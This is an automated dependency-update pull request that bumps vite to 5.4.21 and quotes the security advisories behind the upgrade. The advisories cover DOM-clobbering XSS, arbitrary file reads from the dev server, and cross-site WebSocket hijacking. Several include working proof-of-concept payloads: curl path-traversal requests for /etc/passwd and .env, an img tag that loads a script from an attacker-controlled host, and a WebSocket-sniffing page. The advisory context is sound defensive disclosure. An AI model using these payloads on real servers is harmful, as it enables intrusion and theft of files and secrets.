Note: This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
vite (source)	5.2.11 ->5.4.21

GitHub Vulnerability Alerts

CVE-2024-45812

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts tocjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack:GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1]https://scnps.co/papers/sp23_domclob.pdf
[2]https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format tocjs,iife, orumd. In such cases, Vite replaces relative paths starting with__VITE_ASSET__ using the URL retrieved fromdocument.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. Thedocument.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {  amd: (relativePath) => {    if (relativePath[0] !== ".") relativePath = "./" + relativePath;    return getResolveUrl(      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`    );  },  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(    relativePath  )} : ${getRelativeUrlFromDocument(relativePath)})`,  es: (relativePath) => getResolveUrl(    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`  ),  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),  // NOTE: make sure rollup generate `module` params  system: (relativePath) => getResolveUrl(    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`  ),  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(    relativePath  )} : ${getRelativeUrlFromDocument(relativePath, true)})`};

PoC

Considering a website that contains the followingmain.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.jsimport extraURL from './extra.js?url'var s = document.createElement('script')s.src = extraURLdocument.head.append(s)

// extra.jsexport default "https://myserver/justAnOther.js"

// vite.config.jsimport { defineConfig } from 'vite'export default defineConfig({  build: {    assetsInlineLimit: 0, // To avoid inline assets for PoC    rollupOptions: {      output: {        format: "cjs"      },    },  },  base: "./",});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script,dist/index-DDmIg9VD.js, as part of the web page source code, the page could load theextra.js file from the attacker's domain,attacker.controlled.server. The attacker only needs to insert animg tag with thename attribute set tocurrentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html><html><head>  <title>Vite Example</title>  <!-- Attacker-controlled Script-less HTML Element starts--!>  <img name="currentScript" src="https://attacker.controlled.server/"></img>  <!-- Attacker-controlled Script-less HTML Element ends--!></head><script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script><body></body></html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format ofcjs,iife, orumd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>  getResolveUrl(    `'${escapeId(partialEncodeURIPath(relativePath))}', ${      umd ? `typeof document === 'undefined' ? location.href : ` : ''    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,  )

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest$cd vite-project/$ npm install$ npm run dev$echo"top secret content"> /tmp/secret.txt# expected behaviour$ curl"http://localhost:5173/@&#8203;fs/tmp/secret.txt"<body><h1>403 Restricted</h1><p>The request url&quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.# security bypassed$ curl"http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"export default"top secret content\n"//# sourceMappingURL=data:application/json;base64,eyJ2...

CVE-2025-24010

Summary

Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.

Upgrade Path

Users that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.

• Using the backend integration feature
• Using a reverse proxy in front of Vite
• Accessing the development server via a domain other thanlocalhost or*.localhost
• Using a plugin / framework that connects to the WebSocket server on their own from the browser

Using the backend integration feature

If you are using the backend integration feature and not settingserver.origin, you need to add the origin of the backend server to theserver.cors.origin option. Make sure to set a specific origin rather than*, otherwise any origin can access your development server.

Using a reverse proxy in front of Vite

If you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other thanlocalhost or*.localhost, you need to add the hostname to the newserver.allowedHosts option. For example, if the reverse proxy is sending requests tohttp://vite:5173, you need to addvite to theserver.allowedHosts option.

Accessing the development server via a domain other thanlocalhost or*.localhost

You need to add the hostname to the newserver.allowedHosts option. For example, if you are accessing the development server viahttp://foo.example.com:8080, you need to addfoo.example.com to theserver.allowedHosts option.

Using a plugin / framework that connects to the WebSocket server on their own from the browser

If you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.

In that case, you can either:

• fix the plugin / framework code to the make it compatible with the new version of Vite
• setlegacy.skipWebSocketTokenCheck: true to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite
  • When enabling this option,make sure that you are aware of the security implications described in the impact section of [2] above.

Mitigation without upgrading Vite

[1]: Permissive default CORS settings

Setserver.cors tofalse or limitserver.cors.origin to trusted origins.

[2]: Lack of validation on the Origin header for WebSocket connections

There aren't any mitigations for this.

[3]: Lack of validation on the Host header for HTTP requests

Use Chrome 94+ or use HTTPS for the development server.

Details

There are three causes that allowed malicious websites to send any requests to the development server:

[1]: Permissive default CORS settings

Vite sets theAccess-Control-Allow-Origin header depending onserver.cors option. The default value wastrue which setsAccess-Control-Allow-Origin: *. This allows websites on any origin tofetch contents served on the development server.

Attack scenario:

1. The attacker serves a malicious web page (http://malicious.example.com).
2. The user accesses the malicious web page.
3. The attacker sends afetch('http://127.0.0.1:5173/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
4. The attacker gets the content ofhttp://127.0.0.1:5173/main.js.

[2]: Lack of validation on the Origin header for WebSocket connections

Vite starts a WebSocket server to handle HMR and other functionalities. This WebSocket serverdid not perform validation on the Origin header and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection (list of the file paths that changed, the file content where the errored happened, etc.), but plugins can send arbitrary messages and may include more sensitive information.

Attack scenario:

1. The attacker serves a malicious web page (http://malicious.example.com).
2. The user accesses the malicious web page.
3. The attacker runsnew WebSocket('http://127.0.0.1:5173', 'vite-hmr') by JS in that malicious web page.
4. The user edits some files.
5. Vite sends some HMR messages over WebSocket.
6. The attacker gets the content of the HMR messages.

[3]: Lack of validation on the Host header for HTTP requests

Unlessserver.https is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.

1. The attacker serves a malicious web page that is served onHTTP (http://malicious.example.com:5173) (HTTPS won't work).
2. The user accesses the malicious web page.
3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).
4. The attacker sends afetch('/main.js') request by JS in that malicious web page.
5. The attacker gets the content ofhttp://127.0.0.1:5173/main.js bypassing the same origin policy.

Impact

[1]: Permissive default CORS settings

Users with the defaultserver.cors option may:

• get the source code stolen by malicious websites
• give the attacker access to functionalities that are not supposed to be exposed externally
  • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behindserver.proxy may have those functionalities.

[2]: Lack of validation on the Origin header for WebSocket connections

All users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.

For users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.

For users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.

[3]: Lack of validation on the Host header for HTTP requests

Users using HTTP for the development server and using a browser that is not Chrome 94+ may:

• get the source code stolen by malicious websites
• give the attacker access to functionalities that are not supposed to be exposed externally
  • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behindserver.proxy may have those functionalities.

Chrome 94+ users are not affected for [3], becausesending a request to a private network page from public non-HTTPS page is forbidden since Chrome 94.

Related Information

Safari hasa bug that blocks requests to loopback addresses from HTTPS origins. This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of "the malicious web page is served on HTTP" to make [1] and [2] to work.

PoC

[2]: Lack of validation on the Origin header for WebSocket connections

1. I used thereact template which utilizes HMR functionality.

npm create vite@latest my-vue-app-react -- --template react

2. Then on a malicious server, serve the following POC html:

<!doctype html><htmllang="en"><head><metacharset="utf-8"/><title>vite CSWSH</title></head><body><divid="logs"></div><script>constdiv=document.querySelectorAll('#logs')[0];constws=newWebSocket('ws://localhost:5173','vite-hmr');ws.onmessage=event=>{constlogLine=document.createElement('p');logLine.innerHTML=event.data;div.append(logLine);};</script></body></html>

3. Kick off Vite

npm run dev

4. Load the development server (openhttp://localhost:5173/) as well as the malicious page in the browser.
5. Editsrc/App.jsx file and intentionally place a syntax error
6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed

Here's a video demonstrating the POC:

CVE-2025-31486

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host orserver.host config option) are affected.

Details

.svg

Requests ending with.svg are loaded at this line.
https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290
By adding?.svg with?.wasm?init or withsec-fetch-dest: script header, the restriction was able to bypass.

This bypass is only possible if the file is smaller thanbuild.assetsInlineLimit (default: 4kB) and when using Vite 6.0+.

relative paths

The check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g.../../).

PoC

npm create vite@latestcd vite-project/npm installnpm run dev

send request to readetc/passwd

curl'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'

curl'http://127.0.0.1:5173/@​fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'

CVE-2025-32395

Summary

The contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.

Impact

Only apps with the following conditions are affected.

• explicitly exposing the Vite dev server to the network (using --host orserver.host config option)
• running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)

Details

HTTP 1.1 spec (RFC 9112) does not allow# inrequest-target. Although an attacker can send such a request. For those requests with an invalidrequest-line (it includesrequest-target), the specrecommends to reject them with 400 or 301. The same can be said for HTTP 2 (ref1,ref2,ref3).

On Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value ofhttp.IncomingMessage.url contains#. Vite assumedreq.url won't contain# when checkingserver.fs.deny, allowing those kinds of requests to bypass the check.

On Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value ofhttp.IncomingMessage.url did not contain#.

PoC

npm create vite@latestcd vite-project/npm installnpm run dev

send request to read/etc/passwd

curl --request-target /@​fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173

CVE-2025-46565

Summary

The contents of files inthe projectroot that are denied by a file matching pattern can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host orserver.host config option) are affected.
Only files that are underprojectroot and are denied by a file matching pattern can be bypassed.

• Examples of file matching patterns:.env,.env.*,*.{crt,pem},**/.env
• Examples of other patterns:**/.git/**,.git/**,.git/**/*

Details

server.fs.deny can contain patterns matching against files (by default it includes.env,.env.*,*.{crt,pem} as such patterns).
These patterns were able to bypass for files underroot by using a combination of slash and dot (/.).

PoC

npm create vite@latestcd vite-project/cat "secret" > .envnpm installnpm run devcurl --request-target /.env/. http://localhost:5173

CVE-2025-58752

Summary

Any HTML files on the machine were served regardless of theserver.fs settings.

Impact

Only apps that match the following conditions are affected:

• explicitly exposes the Vite dev server to the network (using --host orserver.host config option)
• appType: 'spa' (default) orappType: 'mpa' is used

This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.

Details

TheserveStaticMiddleware function is in charge of serving static files from the server. It returns theviteServeStaticMiddleware function which runs the needed tests and serves the page. The viteServeStaticMiddleware functionchecks if the extension of the requested file is ".html". If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this casehtmlFallbackMiddleware, and then toindexHtmlMiddleware. These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.

PoC

Execute the following shell commands:

npm  create  vite@latestcd vite-project/echo  "secret" > /tmp/secret.htmlnpm installnpm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:

echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)mkdir secret_filesecho "secret txt" > secret_files/secret.txtecho "secret html" > secret_files/secret.htmlnpm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'

You will receive a 403 HTTP Response,  because everything in the secret_files directory is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'

You will receive the contents of secret_files/secret.html.

CVE-2025-58751

Summary

Files starting with the same name with the public directory were served bypassing theserver.fs settings.

Impact

Only apps that match the following conditions are affected:

• explicitly exposes the Vite dev server to the network (using --host orserver.host config option)
• usesthe public directory feature (enabled by default)
• a symlink exists in the public directory

Details

TheservePublicMiddleware function is in charge of serving public files from the server. It returns theviteServePublicMiddleware function which runs the needed tests and serves the page. The viteServePublicMiddleware functionchecks if the publicFiles variable is defined, and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function.publicFiles may be undefined if there is a symbolic link anywhere inside the public directory. In that case, every requested page will be passed to the public serving function. The serving function is based on thesirv library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middlewaredisables this functionality since public pages are meant to be available always, regardless of whether they are in the allow or deny list.

In the case of public pages, the serving function isprovided with the path to the public directory as a root directory. The code of the sirv libraryuses the join function to get the full path to the requested file. For example, if the public directory is "/www/public", and the requested file is "myfile", the code will join them to the string "/www/public/myfile". The code will then pass this string to the normalize function. Afterwards, the code willuse the string's startsWith function to determine whether the created path is within the given directory or not. Only if it is, it will be served.

Sincesirv trims the trailing slash of the public directory, the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at "/www", and the public directory is at "/www/p", if the created path will be "/www/private.txt", the startsWith function will still return true, because the string "/www/private.txt" starts with  "/www/p". To achieve this, the attacker will use ".." to ask for the file "../private.txt". The code will then join it to the "/www/p" string, and will receive "/www/p/../private.txt". Then, the normalize function will return "/www/private.txt", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).

PoC

Execute the following shell commands:

npm  create  vite@latestcd vite-project/mkdir pcd pln -s a bcd ..echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.jsecho  "secret" > private.txtnpm installnpm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/private.txt'

You will receive a 403 HTTP Response,  because private.txt is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/../private.txt'

You will receive the contents of private.txt.

Related links

• lukeed/sirv@f0113f3

CVE-2025-62522

Summary

Files denied byserver.fs.deny were sent if the URL ended with\ when the dev server is running on Windows.

Impact

Only apps that match the following conditions are affected:

• explicitly exposes the Vite dev server to the network (using --host orserver.host config option)
• running the dev server on Windows

Details

server.fs.deny can contain patterns matching against files (by default it includes.env,.env.*,*.{crt,pem} as such patterns). These patterns were able to bypass by using a back slash(\). The root cause is thatfs.readFile('/foo.png/') loads/foo.png.

PoC

npm create vite@latestcd vite-project/cat"secret"> .envnpm installnpm run devcurl --request-target /.env\http://localhost:5173

Release Notes

Configuration

📅Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕Ignore: Close this PR and you won't be reminded about this update again.

• If you want to rebase/retry this PR, check this box

This PR was generated byMend Renovate. View therepository job log.